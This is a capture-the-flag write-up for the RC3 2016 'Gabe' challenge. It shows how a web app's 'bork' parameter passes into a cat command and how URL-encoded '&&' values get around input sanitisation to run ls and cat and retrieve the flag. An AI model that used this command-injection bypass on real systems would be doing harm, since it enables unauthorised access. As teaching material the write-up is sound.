300 points
We all love doggos and puppers. Have some more of one of our favorite puppers, Gabe. Bork.
https://ctf.rc3.club:3100/
author:orkulus
This challenge was offline for quite a long time, but eventually they fixed it well enough so that it could be analyzed.
The drop down list on the front page shows a list of video clips of a dog barking to various tunes. Closer examination showed that a bork
parameter contains a name of a text file.
When we send a POST request with an empty bork
parameter we get the following error in the response:
1
<iframe width="854" height="480" src="cat: borks/: Is a directory?autoplay=1&loop=1" frameborder="0"></iframe>
This means that they are essentially cat
‘ting the file that is sent in as a parameter. Maybe we can use OS command injection here.
Specifying ..
, /
, ;
, $()
and others as parameter value caused an error, there must be logic in the application that sanitizes the input. However URL-encoding &&
worked, parameter value * %26%26 ls -la
got us the following list:
1
2
3
4
5
6
7
8
9
10
-rw-r--r-- 1 root root 77 Nov 20 06:24 auto_bork.sh
-rw-r--r-- 2 root root 153 Nov 19 17:22 bork.ini
-rw-r--r-- 1 root root 1450 Nov 20 06:32 bork.py
-rw-r--r-- 2 root root 1347 Nov 19 17:22 bork.pyc
-rw-r----- 2 root root 0 Nov 19 17:22 bork.sock
-rw-r--r-- 2 root root 18 Nov 19 17:22 bork.txt
drwxr-xr-x 2 root root 4096 Nov 19 18:03 borks
drwxr-xr-x 2 root root 4096 Nov 19 18:03 static
drwxr-xr-x 2 root root 4096 Nov 19 18:03 templates
-rw-r--r-- 2 root root 86 Nov 19 17:22 wsgi.py
We examined all of these files and eventually got the flag RC3-2016-L057d0g3
by specifying parameter value * %26%26 cat bork.txt
.